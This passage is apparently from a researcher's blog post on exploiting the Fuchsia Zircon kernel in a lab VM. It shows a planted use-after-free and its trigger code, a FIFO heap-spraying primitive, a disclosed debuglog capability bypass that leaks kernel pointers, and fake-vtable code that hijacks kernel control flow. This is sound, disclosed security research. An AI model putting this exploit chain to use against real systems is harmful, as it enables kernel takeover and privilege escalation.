   if [[ "$stat_output" =~ Size:\ ([0-9]+) ]]; then

Running Fuchsia in QEMU/KVM enables debugging of the Zircon microkernel with GDB. Let's see that in action.

1. Start Fuchsia with this command:

$ fx qemu -N -s 1 --no-kvm -- -s
• The -s 1 argument specifies the number of virtual CPUs for this virtual machine. Having a single virtual CPU makes the debugging experience better.
• The --no-kvm argument is useful if you need single-stepping during the debugging session. Otherwise KVM interrupts break the workflow and Fuchsia gets into the interrupt handler after each stepi or nexti GDB command. However, running Fuchsia VM without KVM virtualization support is much slower.
• The -s argument at the end of the command opens a gdbserver on TCP port 1234.

2. Allow execution of the Zircon GDB script, which provides several things:

• KASLR relocation for GDB, which is needed for setting breakpoints correctly.
• Special GDB commands with a zircon prefix.
• Pretty-printers for Zircon objects (none at the moment, alas).
• Enhanced unwinder for Zircon kernel faults.
$ cat ~/.gdbinit
add-auto-load-safe-path /home/a13x/develop/fuchsia/src/fuchsia/out/default/kernel_x64/zircon.elf-gdb.py

3. Start the GDB client and attach to the GDB server of the Fuchsia VM:

$ cd /home/a13x/develop/fuchsia/src/fuchsia/out/default/
$ gdb kernel_x64/zircon.elf
(gdb) target extended-remote :1234

This procedure is for debugging Zircon with GDB. On my machine, however, the Zircon GDB script completely hung on each start, and I had to debug this script. I found out that it calls the add-symbol-file GDB command with the -readnow parameter, which requires reading the entire symbol file immediately. For some reason, GDB was unable to chew through the symbols from the 110MB Zircon binary within a reasonable time. Removing this option fixed the bug on my machine and allowed normal Zircon debugging (click on the GDB screenshot to zoom in):

diff --git a/zircon/kernel/scripts/zircon.elf-gdb.py b/zircon/kernel/scripts/zircon.elf-gdb.py
index d027ce4af6d..8faf73ba19b 100644
--- a/zircon/kernel/scripts/zircon.elf-gdb.py
+++ b/zircon/kernel/scripts/zircon.elf-gdb.py
@@ -798,3 +798,3 @@ def _offset_symbols_and_breakpoints(kernel_relocated_base=None):
         # Reload the ELF with all sections set
-        gdb.execute("add-symbol-file \"%s\" 0x%x -readnow %s" \
+        gdb.execute("add-symbol-file \"%s\" 0x%x %s" \
                     % (sym_path, text_addr, " ".join(args)), to_string=True)

## Getting closer to Fuchsia security: enable KASAN

KASAN (Kernel Address SANitizer) is a runtime memory debugger designed to find out-of-bounds accesses and use-after-free bugs. Fuchsia supports compiling the Zircon microkernel with KASAN. For this experiment, I built the Fuchsia core product:

$ fx set core.x64 --with-base //bundles:tools --with-base //src/a13x-pwns-fuchsia --variant=kasan
$ fx build

For testing KASAN, I added a synthetic bug to the Fuchsia code working with the TimerDispatcher object:

diff --git a/zircon/kernel/object/timer_dispatcher.cc b/zircon/kernel/object/timer_dispatcher.cc
index a83b750ad4a..14535e23ca9 100644
--- a/zircon/kernel/object/timer_dispatcher.cc
+++ b/zircon/kernel/object/timer_dispatcher.cc
@@ -184,2 +184,4 @@ void TimerDispatcher::OnTimerFired() {
+  bool uaf = false;
+  {
@@ -187,2 +189,6 @@ void TimerDispatcher::OnTimerFired() {
+    if (deadline_ % 100000 == 31337) {
+      uaf = true;
+    }
+
     if (cancel_pending_) {
@@ -210,3 +216,3 @@ void TimerDispatcher::OnTimerFired() {
   // ourselves.
-  if (Release())
+  if (Release() || uaf)
     delete this;

As you can see, if the timer deadline value ends with 31337, then the TimerDispatcher object is freed regardless of the refcount value. I wanted to hit this kernel bug from the userspace component to see the KASAN error report. This is the code I added to my a13x-pwns-fuchsia component:

  zx_status_t status;
  zx_handle_t timer;
  zx_time_t deadline;

  status = zx_timer_create(ZX_TIMER_SLACK_LATE, ZX_CLOCK_MONOTONIC, &timer);
  if (status != ZX_OK) {
    printf("[-] creating timer failed\n");
    return 1;
  }
  printf("[+] timer is created\n");

  deadline = zx_deadline_after(ZX_MSEC(500));
  deadline = deadline - deadline % 100000 + 31337;
  status = zx_timer_set(timer, deadline, 0);
  if (status != ZX_OK) {
    printf("[-] setting timer failed\n");
    return 1;
  }
  printf("[+] timer is set with deadline %ld\n", deadline);
  fflush(stdout);

  zx_nanosleep(zx_deadline_after(ZX_MSEC(800))); // timer fired
  zx_timer_cancel(timer); // hit UAF

Here the zx_timer_create() syscall is called. It initializes the timer handle of a new timer object. Then this program sets the timer deadline to the magic value that ends with 31337. While this program waits on zx_nanosleep(), Zircon deletes the fired timer. The following zx_timer_cancel() syscall for the deleted timer provokes a use-after-free.
So executing this userspace component crashed the Zircon kernel and delivered a lovely KASAN report. Nice, KASAN works! Quoting the relevant parts:

ZIRCON KERNEL PANIC

UPTIME: 17826ms, CPU: 2
...
KASAN detected a write error: ptr={{{data:0xffffff806cd31ea8}}}, size=0x4, caller: {{{pc:0xffffffff003c169a}}}

Shadow memory state around the buggy address 0xffffffe00d9a63d5:
0xffffffe00d9a63c0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffffffe00d9a63c8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffffffe00d9a63d0: 0xfa 0xfa 0xfa 0xfa 0xfd 0xfd 0xfd 0xfd
                                             ^^
0xffffffe00d9a63d8: 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd
0xffffffe00d9a63e0: 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd

*** KERNEL PANIC (caller pc: 0xffffffff0038910d, stack frame: 0xffffff97bd72ee70):
...
Halted entering panic shell loop

Zircon also prints the crash backtrace as a chain of obscure kernel addresses. To make it human-readable, I had to process it with a special Fuchsia tool:

$ cat crash.txt | fx symbolize > crash_sym.txt

Here’s how the backtrace looks after fx symbolize:

dso: id=58d07915d755d72e base=0xffffffff00100000 name=zircon.elf
#0    0xffffffff00324b7d in platform_specific_halt(platform_halt_action, zircon_crash_reason_t, bool) ../../zircon/kernel/platform/pc/power.cc:154 <kernel>+0xffffffff80324b7d
#1    0xffffffff005e4610 in platform_halt(platform_halt_action, zircon_crash_reason_t) ../../zircon/kernel/platform/power.cc:65 <kernel>+0xffffffff805e4610
#2.1  0xffffffff0010133e in $anon::PanicFinish() ../../zircon/kernel/top/debug.cc:59 <kernel>+0xffffffff8010133e
#2    0xffffffff0010133e in panic(const char*) ../../zircon/kernel/top/debug.cc:92 <kernel>+0xffffffff8010133e
#3    0xffffffff0038910d in asan_check(uintptr_t, size_t, bool, void*) ../../zircon/kernel/lib/instrumentation/asan/asan-poisoning.cc:180 <kernel>+0xffffffff8038910d
#4.4  0xffffffff003c169a in std::__2::__cxx_atomic_fetch_add<int>(std::__2::__cxx_atomic_base_impl<int>*, int, std::__2::memory_order) ../../prebuilt/third_party/clang/linux-x64/include/c++/v1/atomic:1002 <kernel>+0xffffffff803c169a
#4.3  0xffffffff003c169a in std::__2::__atomic_base<int, true>::fetch_add(std::__2::__atomic_base<int, true>*, int, std::__2::memory_order) ../../prebuilt/third_party/clang/linux-x64/include/c++/v1/atomic:1686 <kernel>+0xffffffff803c169a
#4.2  0xffffffff003c169a in fbl::internal::RefCountedBase<true>::AddRef(const fbl::internal::RefCountedBase<true>*) ../../zircon/system/ulib/fbl/include/fbl/ref_counted_internal.h:39 <kernel>+0xffffffff803c169a
#4.1  0xffffffff003c169a in fbl::RefPtr<Dispatcher>::operator=(const fbl::RefPtr<Dispatcher>&, fbl::RefPtr<Dispatcher>*) ../../zircon/system/ulib/fbl/include/fbl/ref_ptr.h:89 <kernel>+0xffffffff803c169a
#4    0xffffffff003c169a in HandleTable::GetDispatcherWithRightsImpl<TimerDispatcher>(HandleTable*, zx_handle_t, zx_rights_t, fbl::RefPtr<TimerDispatcher>*, zx_rights_t*, bool) ../../zircon/kernel/object/include/object/handle_table.h:243 <kernel>+0xffffffff803c169a
#5.2  0xffffffff003d3f02 in HandleTable::GetDispatcherWithRights<TimerDispatcher>(HandleTable*, zx_handle_t, zx_rights_t, fbl::RefPtr<TimerDispatcher>*, zx_rights_t*) ../../zircon/kernel/object/include/object/handle_table.h:108 <kernel>+0xffffffff803d3f02
#5.1  0xffffffff003d3f02 in HandleTable::GetDispatcherWithRights<TimerDispatcher>(HandleTable*, zx_handle_t, zx_rights_t, fbl::RefPtr<TimerDispatcher>*) ../../zircon/kernel/object/include/object/handle_table.h:116 <kernel>+0xffffffff803d3f02
#5    0xffffffff003d3f02 in sys_timer_cancel(zx_handle_t) ../../zircon/kernel/lib/syscalls/timer.cc:67 <kernel>+0xffffffff803d3f02
#6.2  0xffffffff003e1ef1 in λ(const wrapper_timer_cancel::(anon class)*, ProcessDispatcher*) gen/zircon/vdso/include/lib/syscalls/kernel-wrappers.inc:1170 <kernel>+0xffffffff803e1ef1
#6.1  0xffffffff003e1ef1 in do_syscall<(lambda at gen/zircon/vdso/include/lib/syscalls/kernel-wrappers.inc:1169:85)>(uint64_t, uint64_t, bool (*)(uintptr_t), wrapper_timer_cancel::(anon class)) ../../zircon/kernel/lib/syscalls/syscalls.cc:106 <kernel>+0xffffffff803e1ef1
#6    0xffffffff003e1ef1 in wrapper_timer_cancel(SafeSyscallArgument<unsigned int, true>::RawType, uint64_t) gen/zircon/vdso/include/lib/syscalls/kernel-wrappers.inc:1169 <kernel>+0xffffffff803e1ef1
#7    0xffffffff005618e8 in gen/zircon/vdso/include/lib/syscalls/kernel.inc:1103 <kernel>+0xffffffff805618e8

You can see that the wrapper_timer_cancel() syscall handler calls sys_timer_cancel(), where GetDispatcherWithRightsImpl<TimerDispatcher>() works with a reference counter and performs the use-after-free. This memory access error is detected in asan_check(), which calls panic().

This backtrace helped me to understand how the C++ code of the sys_timer_cancel() function actually works:

// zx_status_t zx_timer_cancel
zx_status_t sys_timer_cancel(zx_handle_t handle) {
  auto up = ProcessDispatcher::GetCurrent();
  fbl::RefPtr<TimerDispatcher> timer;
  zx_status_t status = up->handle_table().GetDispatcherWithRights(handle, ZX_RIGHT_WRITE, &timer);
  if (status != ZX_OK)
    return status;
  return timer->Cancel();
}

When I got Fuchsia OS working with KASAN, I felt confident and ready for the security research.

## Syzkaller for Fuchsia (is broken)

After studying the basics of the Fuchsia kernel development workflow, I decided to start the security research. For experiments with Fuchsia kernel security, I needed a Zircon bug for developing a PoC exploit. The simplest way to achieve that was fuzzing.
There is a great coverage-guided kernel fuzzer called syzkaller. I'm fond of this project and its team, and I like using it for fuzzing the Linux kernel. The syzkaller documentation says that it supports fuzzing Fuchsia, so I tried it first. However, I ran into trouble caused by the unusual software delivery on Fuchsia, which I described earlier.

A Fuchsia image for fuzzing must contain syz-executor as a component. syz-executor is the part of the syzkaller project responsible for executing the fuzzing input on a virtual machine. But I didn't manage to build a Fuchsia image with this component.

First, I tried building Fuchsia with external syzkaller source code, according to the syzkaller documentation:

```
$ fx --dir "out/x64" set core.x64 \
  --with-base "//bundles:tools" \
  --with-base "//src/testing/fuzzing/syzkaller" \

ERROR at //build/go/go_library.gni:43:3 (//build/toolchain:host_x64): Assertion failed.
  assert(defined(invoker.sources), "sources is required for go_library")
  ^-----
sources is required for go_library
See //src/testing/fuzzing/syzkaller/BUILD.gn:106:3: whence it was called.
  go_library("syzkaller-go") {
  ^---------------------------
See //src/testing/fuzzing/syzkaller/BUILD.gn:85:5: which caused the file to be included.
    ":run-sysgen($host_toolchain)",
    ^-----------------------------
ERROR: error running gn gen: exit status 1
```

It looks like the build system doesn't handle the syzkaller_dir argument properly. I tried to remove this assertion and debug the Fuchsia build system, but I failed.

Then I found the third_party/syzkaller/ subdirectory in the Fuchsia source code. It contains a local copy of the syzkaller sources that is used for building without --args=syzkaller_dir. But it's quite an old copy: the last commit is from June 2, 2020. Building the current Fuchsia with this old version of syzkaller failed as well, because of a number of changes in Fuchsia syscalls, header file locations, and so on.

I tried one more time and updated syzkaller in the third_party/syzkaller/ subdirectory. But building didn't work because the Fuchsia BUILD.gn file for syzkaller needed substantial rewriting to match the syzkaller changes.

In short, Fuchsia was integrated with the syzkaller kernel fuzzer once in 2020, but currently this integration is broken. I looked at the Fuchsia version control system to find the Fuchsia developers who had committed to this functionality. I wrote them an email describing all the technical details of this bug, but didn't get a reply. Spending more time on the Fuchsia build system was stressing me out.

## Thoughts on the research strategy

I reflected on my strategy for the further research. Without fuzzing, successful vulnerability discovery in an OS kernel requires:

1. Good knowledge of its codebase
2. Deep understanding of its attack surface

Getting this experience with Fuchsia would require a lot of my time. Did I want to spend a lot of time on my first Fuchsia research?
Perhaps not, because:

- Committing large resources to a first acquaintance with the system is not reasonable
- Fuchsia turned out to be less production-ready than I expected

So I decided to postpone searching for zero-day vulnerabilities in Zircon and instead develop a PoC exploit for the synthetic bug that I had used for testing KASAN. Ultimately, that was a good decision, because it gave me quick results and allowed me to find other Zircon vulnerabilities along the way.

## Discovering a heap spraying exploit primitive for Zircon

So I focused on exploiting the use-after-free for TimerDispatcher. My exploitation strategy was simple: overwrite the freed TimerDispatcher object with controlled data that would make the Zircon timer code work abnormally or, in other words, would turn this code into a weird machine.

First of all, for overwriting TimerDispatcher, I needed to discover a heap spraying exploit primitive that:

1. Can be used by the attacker from an unprivileged userspace component
2. Makes Zircon allocate a new kernel object at the location of the freed object
3. Makes Zircon copy the attacker's data from userspace into this new kernel object

I knew from my Linux kernel experience that heap spraying is usually constructed using inter-process communication (IPC). Basic IPC syscalls are usually available to unprivileged programs, satisfying point 1. They copy userspace data into the kernelspace to transfer it to the recipient, satisfying point 3. And finally, some IPC syscalls let the caller set the data size for the transfer, which gives control over the kernel allocator behavior and allows the attacker to overwrite the target freed object, satisfying point 2.

That's why I started to study the Zircon syscalls responsible for IPC. I found Zircon FIFOs, which turned out to be an excellent heap spraying primitive. When the zx_fifo_create() syscall is called, Zircon creates a pair of FifoDispatcher objects (see the code in zircon/kernel/object/fifo_dispatcher.cc).
Each of them allocates the required amount of kernel memory for the FIFO data:

```cpp
  auto data0 = ktl::unique_ptr<uint8_t[]>(new (&ac) uint8_t[count * elemsize]);
  if (!ac.check())
    return ZX_ERR_NO_MEMORY;

  KernelHandle fifo0(fbl::AdoptRef(
      new (&ac) FifoDispatcher(ktl::move(holder0), options, static_cast<uint32_t>(count),
                               static_cast<uint32_t>(elemsize), ktl::move(data0))));
  if (!ac.check())
    return ZX_ERR_NO_MEMORY;
```

With the debugger, I determined that the size of the freed TimerDispatcher object is 248 bytes. I assumed that for successful heap spraying I needed to create Zircon FIFOs with data buffers of the same size. This idea worked instantly: in GDB I saw that Zircon overwrote the freed TimerDispatcher with FifoDispatcher data! This is the heap spraying code in my PoC exploit:

```c
  printf("[!] do heap spraying...\n");

#define N 10
  zx_handle_t out0[N];
  zx_handle_t out1[N];
  size_t write_result = 0;

  for (int i = 0; i < N; i++) {
    status = zx_fifo_create(31, 8, 0, &out0[i], &out1[i]);
    if (status != ZX_OK) {
      printf("[-] creating a fifo %d failed\n", i);
      return 1;
    }
  }
```

Here the zx_fifo_create() syscall is executed 10 times. Each call creates a pair of FIFOs containing 31 elements, where the size of each element is 8 bytes. So this code creates 20 FifoDispatcher objects with 248-byte data buffers.
And here the Zircon FIFOs are filled with the heap spraying payload prepared for overwriting the freed TimerDispatcher object:

```c
  for (int i = 0; i < N; i++) {
    status = zx_fifo_write(out0[i], 8, spray_data, 31, &write_result);
    if (status != ZX_OK || write_result != 31) {
      printf("[-] writing to fifo 0-%d failed, error %d, result %zu\n",
             i, status, write_result);
      return 1;
    }
    status = zx_fifo_write(out1[i], 8, spray_data, 31, &write_result);
    if (status != ZX_OK || write_result != 31) {
      printf("[-] writing to fifo 1-%d failed, error %d, result %zu\n",
             i, status, write_result);
      return 1;
    }
  }
  printf("[+] heap spraying is finished\n");
```

Ok, I got the ability to change the contents of the TimerDispatcher object. But what should I write into it to mount the attack?

## C++ object anatomy

As a Linux kernel developer, I was used to C structures describing kernel objects. A method of a Linux kernel object is implemented as a function pointer stored in the corresponding C structure. This memory layout is explicit and simple. But the memory layout of C++ objects in Zircon looked much more complex and obscure to me. I tried to study the anatomy of the TimerDispatcher object and displayed it in GDB using the command print -pretty on -vtbl on. The output was a big mess, and I didn't manage to correlate it with the hexdump of the object. Then I tried the pahole utility on TimerDispatcher. It showed the offsets of the class members, but didn't help with understanding how the class methods are implemented. Class inheritance made the whole picture even more complicated.

I decided not to waste my time on studying TimerDispatcher object internals, but to try blind practice instead. I used the FIFO heap spraying to overwrite the whole TimerDispatcher with zero bytes and saw what happened. Zircon crashed at the assertion in zircon/system/ulib/fbl/include/fbl/ref_counted_internal.h:57:

```cpp
    const int32_t rc = ref_count_.fetch_add(1, std::memory_order_relaxed);
    //...
    if constexpr (EnableAdoptionValidator) {
      ZX_ASSERT_MSG(rc >= 1, "count %d(0x%08x) < 1\n", rc, static_cast<uint32_t>(rc));
    }
```

No problem. I found that this refcount is stored at offset 8 from the beginning of the TimerDispatcher object. To bypass this check, I set the corresponding bytes in the heap spraying payload:

```c
  unsigned int *refcount_ptr = (unsigned int *)&spray_data[8];

  *refcount_ptr = 0x1337C0DE;
```

Running this PoC on Fuchsia resulted in the next Zircon crash, which was very interesting from the attacker's point of view. The kernel hit a null pointer dereference in HandleTable::GetDispatcherWithRights<TimerDispatcher>. Stepping through the instructions with GDB helped me find out that this piece of C++ dark magic causes Zircon to crash:

```cpp
// Dispatcher -> FooDispatcher
template <typename T>
fbl::RefPtr<T> DownCastDispatcher(fbl::RefPtr<Dispatcher>* disp) {
  return (likely(DispatchTag<T>::ID == (*disp)->get_type()))
             ? fbl::RefPtr<T>::Downcast(ktl::move(*disp))
             : nullptr;
}
```

Here Zircon calls the get_type() public method of the TimerDispatcher class. This method is referenced via a C++ vtable. The pointer to the TimerDispatcher vtable is stored at the beginning of each TimerDispatcher object, which makes it great for control-flow hijacking. I would say it is even simpler than similar attacks against the Linux kernel, where you need to search for appropriate kernel structures containing function pointers.

## Zircon KASLR bypass

Control-flow hijacking requires knowledge of kernel symbol addresses, which depend on the KASLR offset. KASLR stands for kernel address space layout randomization. The Zircon source code mentions KASLR many times. An example from zircon/kernel/params.gni:

```
  # Virtual address where the kernel is mapped statically.  This is the
  # base of addresses that appear in the kernel symbol table.  At runtime
  # KASLR relocation processing adjusts addresses in memory from this base
  # to the actual runtime virtual address.
  if (current_cpu == "arm64") {
    kernel_base = "0xffffffff00000000"
  } else if (current_cpu == "x64") {
    kernel_base = "0xffffffff80100000"  # Has KERNEL_LOAD_OFFSET baked into it.
  }
```

For Fuchsia, I decided to implement a trick similar to my KASLR bypass for the Linux kernel. My PoC exploit for CVE-2021-26708 used the Linux kernel log for reading kernel pointers to mount the attack. The Fuchsia kernel log contains security-sensitive information as well, so I tried to read the Zircon log from my unprivileged userspace component. I added

```
use: [
    { protocol: "fuchsia.boot.ReadOnlyLog" },
]
```

to the component manifest and opened the log with this code:

```cpp
  zx::channel local, remote;
  zx_status_t status = zx::channel::create(0, &local, &remote);
  if (status != ZX_OK) {
    fprintf(stderr, "Failed to create channel: %d\n", status);
    return -1;
  }

  const char kReadOnlyLogPath[] = "/svc/" fuchsia_boot_ReadOnlyLog_Name;
  status = fdio_service_connect(kReadOnlyLogPath, remote.release());
  if (status != ZX_OK) {
    fprintf(stderr, "Failed to connect to ReadOnlyLog: %d\n", status);
    return -1;
  }

  zx_handle_t h;
  status = fuchsia_boot_ReadOnlyLogGet(local.get(), &h);
  if (status != ZX_OK) {
    fprintf(stderr, "ReadOnlyLogGet failed: %d\n", status);
    return -1;
  }
```

First, this code creates a Fuchsia channel that will be used for the Fuchsia log protocol. Then it calls fdio_service_connect() for ReadOnlyLog and attaches the channel transport to it. These functions are from the fdio library, which provides a unified interface to a variety of Fuchsia resources: files, sockets, services, and others. Executing this code returns the error:

```
[ffx-laboratory:a13x_pwns_fuchsia] WARNING: Failed to route protocol fuchsia.boot.ReadOnlyLog with target component /core/ffx-laboratory:a13x_pwns_fuchsia: A use from parent declaration was found at /core/ffx-laboratory:a13x_pwns_fuchsia for fuchsia.boot.ReadOnlyLog, but no matching offer declaration was found in the parent
[ffx-laboratory:a13x_pwns_fuchsia] INFO: [!] try opening kernel log...
[ffx-laboratory:a13x_pwns_fuchsia] INFO: ReadOnlyLogGet failed: -24
```

That is correct behavior. My component is unprivileged, and there is no matching offer declaration of fuchsia.boot.ReadOnlyLog in the parent. No access is granted since this Fuchsia component doesn't have the required capability. No way.

So I dropped the idea of an infoleak from the kernel log. I started browsing through the Fuchsia source code, waiting for another insight. Suddenly I found another way to access the Fuchsia kernel log, using the zx_debuglog_create() syscall:

```c
zx_status_t zx_debuglog_create(zx_handle_t resource,
                               uint32_t options,
                               zx_handle_t* out);
```

The Fuchsia documentation says that the resource argument must have the resource kind ZX_RSRC_KIND_ROOT. My Fuchsia component doesn't own this resource. Anyway, I tried using zx_debuglog_create() and...

```c
zx_handle_t root_resource; // global var initialized by 0

int main(int argc, const char** argv)
{
  zx_status_t status;
  zx_handle_t debuglog;

  status = zx_debuglog_create(root_resource, ZX_LOG_FLAG_READABLE, &debuglog);
  if (status != ZX_OK) {
    printf("[-] can't create debuglog, no way\n");
    return 1;
  }
```

And this code worked! I managed to read the Zircon kernel log without the required capability and without the ZX_RSRC_KIND_ROOT resource. But why? I was amazed and found the Zircon code responsible for handling this syscall. Here's what I found:

```cpp
zx_status_t sys_debuglog_create(zx_handle_t rsrc, uint32_t options, user_out_handle* out) {
  LTRACEF("options 0x%x\n", options);

  // TODO(fxbug.dev/32044) Require a non-INVALID handle.
  if (rsrc != ZX_HANDLE_INVALID) {
    // TODO(fxbug.dev/30918): finer grained validation
    zx_status_t status = validate_resource(rsrc, ZX_RSRC_KIND_ROOT);
    if (status != ZX_OK)
      return status;
  }
```

A hilarious security check indeed! The Fuchsia bug report system gave access denied for issues 32044 and 30918.
So I filed a security bug describing that sys_debuglog_create() has an improper capability check leading to a kernel infoleak. By the way, the issue tracker asked for the info in plain text, but by default it rendered the report as Markdown (that's weird; click the Markdown button to disable this behavior). The Fuchsia maintainers approved the issue and requested CVE-2022-0882.

## Zircon KASLR: nothing to bypass

As reading the Fuchsia kernel log was no longer a problem, I extracted some kernel pointers from it to bypass Zircon KASLR. And I was amazed for a second time, and laughed again: despite KASLR, the kernel pointers were the same on every Fuchsia boot! See the examples of identical log output.

Boot #1:

```
[0.197] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00263f20 (pmm_boot_memory) at level 0xdffff, flags 0x1
[0.197] 00000:01029> Free memory after kernel init: 8424374272 bytes.
[0.197] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00114040 (kernel_shell) at level 0xe0000, flags 0x1
[0.197] 00000:01029> INIT: cpu 0, calling hook 0xffffffff0029e300 (userboot) at level 0xe0000, flags 0x1
[0.200] 00000:01029> userboot: ramdisk 0x18c5000 @ 0xffffff8003bdd000
[0.201] 00000:01029> userboot: userboot rodata 0 @ [0x2ca730e3000,0x2ca730e9000)
[0.201] 00000:01029> userboot: userboot code 0x6000 @ [0x2ca730e9000,0x2ca73100000)
[0.201] 00000:01029> userboot: vdso/next rodata 0 @ [0x2ca73100000,0x2ca73108000)
```

Boot #2:

```
[0.194] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00263f20 (pmm_boot_memory) at level 0xdffff, flags 0x1
[0.194] 00000:01029> Free memory after kernel init: 8424361984 bytes.
[0.194] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00114040 (kernel_shell) at level 0xe0000, flags 0x1
[0.194] 00000:01029> INIT: cpu 0, calling hook 0xffffffff0029e300 (userboot) at level 0xe0000, flags 0x1
[0.194] 00000:01029> userboot: ramdisk 0x18c5000 @ 0xffffff8003bdd000
[0.198] 00000:01029> userboot: userboot rodata 0 @ [0x2bc8b83c000,0x2bc8b842000)
[0.198] 00000:01029> userboot: userboot code 0x6000 @ [0x2bc8b842000,0x2bc8b859000)
[0.198] 00000:01029> userboot: vdso/next rodata 0 @ [0x2bc8b859000,0x2bc8b861000)
```

The kernel pointers are the same: Zircon KASLR doesn't work. I filed a security issue in the Fuchsia bug tracker (disable the Markdown mode to see it properly). The Fuchsia maintainers replied that this issue was already known to them. Fuchsia OS turned out to be more experimental than I had expected.

## C++ vtables in Zircon

After I realized that Fuchsia kernel functions have constant addresses, I started to study the vtables of Zircon C++ objects. I thought that constructing a fake vtable could enable control-flow hijacking. As I mentioned, the pointer to the corresponding vtable is stored at the beginning of the object. This is what GDB shows for a TimerDispatcher object:

```
(gdb) info vtbl *(TimerDispatcher *)0xffffff802c5ae768
vtable for 'TimerDispatcher' @ 0xffffffff003bd11c (subobject @ 0xffffff802c5ae768):
[0]: 0xffdffe64ffdffd24
[1]: 0xffdcb5a4ffe00454
[2]: 0xffdffea4ffdc7824
[3]: 0xffd604c4ffd519f4
...
```

The weird values like 0xffdcb5a4ffe00454 are definitely not kernel addresses. I looked at the code that works with the TimerDispatcher vtable:

```cpp
// Dispatcher -> FooDispatcher
template <typename T>
fbl::RefPtr<T> DownCastDispatcher(fbl::RefPtr<Dispatcher>* disp) {
  return (likely(DispatchTag<T>::ID == (*disp)->get_type()))
             ? fbl::RefPtr<T>::Downcast(ktl::move(*disp))
             : nullptr;
}
```

This high-level C++ nightmare turns into the following simple assembly:

```
   mov    rax,QWORD PTR [r13+0x0]
   movsxd r11,DWORD PTR [rax+0x8]
   add    r11,rax
   mov    rdi,r13
   call   0xffffffff0031a77c <__x86_indirect_thunk_r11>
```

Here the r13 register stores the address of the TimerDispatcher object. The vtable pointer resides at the beginning of the object, so after the first mov instruction the rax register stores the address of the vtable itself. Then the movsxd instruction moves the 32-bit value 0xffe00454 from the vtable to the r11 register, sign-extending it from a 32-bit source to a 64-bit destination: 0xffe00454 turns into 0xffffffffffe00454. Then the vtable address is added to this value in r11, which forms the address of the TimerDispatcher method:

```
(gdb) x $r11
0xffffffff001bd570 <_ZNK15TimerDispatcher8get_typeEv>:	0x000016b8e5894855
```

## Fake vtable for the win

Despite this weird pointer arithmetic in Zircon vtables, I decided to craft a fake TimerDispatcher vtable to hijack the kernel control flow. That led me to the question of where to place my fake vtable. The simplest way is to create it in userspace. However, Zircon on x86_64 supports SMAP (Supervisor Mode Access Prevention), which blocks access to userspace data from the kernelspace.

In my Linux Kernel Defence Map, you can see SMAP among various mitigations of control-flow hijacking attacks in the Linux kernel.

I saw multiple ways to bypass the SMAP protection by placing the fake vtable in the kernelspace:

1. For example, Zircon also has physmap like the Linux kernel, which makes the idea of the ret2dir attack for Zircon very promising.
2. Another idea was to use a kernel log infoleak of some kernel address that points to the data controlled by the attacker.

But to simplify my first security experiment with Fuchsia, I decided to disable SMAP and SMEP in the script starting QEMU and create the fake vtable in my exploit in the userspace:

```c
#define VTABLE_SZ 16
unsigned long fake_vtable[VTABLE_SZ] = { 0 }; // global array
```

Then I made the exploit use this fake vtable in the heap spraying data that overwrites the TimerDispatcher object:

```c
#define DATA_SZ 512
unsigned char spray_data[DATA_SZ] = { 0 };
unsigned long **vtable_ptr = (unsigned long **)&spray_data[0];

// Control-flow hijacking in DownCastDispatcher():
//   mov    rax,QWORD PTR [r13+0x0]
//   movsxd r11,DWORD PTR [rax+0x8]
//   mov    rdi,r13
//   call   0xffffffff0031a77c <__x86_indirect_thunk_r11>

*vtable_ptr = &fake_vtable[0]; // address in rax
fake_vtable[1] = (unsigned long)pwn - (unsigned long)*vtable_ptr; // value for DWORD PTR [rax+0x8]
```

This looks tricky, but fear not, you’ll like it!

Here the spray_data array stores the data for zx_fifo_write() overwriting TimerDispatcher. The vtable pointer resides at the beginning of the TimerDispatcher object, so vtable_ptr is initialized with the address of spray_data[0]. Then the address of the fake_vtable global array is written to the beginning of spray_data. This address will appear in the rax register in DownCastDispatcher(), which I described above. The fake_vtable[1] element (or DWORD PTR [rax+0x8]) should store the value for calculating the function pointer of the TimerDispatcher.get_type() method. To calculate this value, I subtract the address of the fake vtable from the address of my pwn() function, which I'm going to use to attack the Zircon kernel.

This is the magic that happens with the addresses when the exploit is executed. The real example:

1. The fake_vtable array is at 0x35aa74aa020 and the pwn() function is at 0x35aa74a80e0
2. fake_vtable[1] is 0x35aa74a80e0 - 0x35aa74aa020 = 0xffffffffffffe0c0. In DownCastDispatcher() this value appears in DWORD PTR [rax+0x8]
3. After Zircon executes the movsxd r11, DWORD PTR [rax+0x8], the r11 register stores 0xffffffffffffe0c0
4. Adding rax (which holds 0x35aa74aa020) to r11 gives 0x35aa74a80e0, which is exactly the address of pwn()
5. So when Zircon calls __x86_indirect_thunk_r11, the control flow goes to the pwn() function of the exploit.

## What to hack in Fuchsia?

After achieving arbitrary code execution in the Zircon kernelspace, I started to think about what to attack with it.

My first thought was to forge a fake ZX_RSRC_KIND_ROOT superpower resource, which I had previously seen in zx_debuglog_create(). But I didn’t manage to engineer privilege escalation using ZX_RSRC_KIND_ROOT, because this resource is not used that much in the Fuchsia source code.

Knowing that Zircon is a microkernel, I realized that privilege escalation requires attacking the inter-process communication (IPC) that goes through the microkernel. In other words, I needed to use arbitrary code execution in Zircon to hijack the IPC between Fuchsia userspace components, for example, between my unprivileged exploit component and some privileged entity like the Component Manager.

I returned to studying the Fuchsia userspace, which was messy and boring… But suddenly I got an idea:

What about planting a rootkit into Zircon?

That looked much more interesting, so I switched to investigating how Zircon syscalls work.

## Fuchsia syscalls

The life of a Fuchsia syscall is briefly described in the documentation. Like the Linux kernel, Zircon also has a syscall table. On x86_64, Zircon defines the x86_syscall() function in fuchsia/zircon/kernel/arch/x86/syscall.S, which has the following code (I removed the comments):

```
    cmp     $ZX_SYS_COUNT, %rax
    jae     .Lunknown_syscall
    leaq    .Lcall_wrapper_table(%rip), %r11
    movq    (%r11,%rax,8), %r11
    lfence
    jmp     *%r11
```

Here's how this code looks in the debugger:

```
   0xffffffff00306fc8 <+56>:	cmp    rax,0xb0
   0xffffffff00306fce <+62>:	jae    0xffffffff00306fe1 <x86_syscall+81>
   0xffffffff00306fd0 <+64>:	lea    r11,[rip+0xbda21]        # 0xffffffff003c49f8
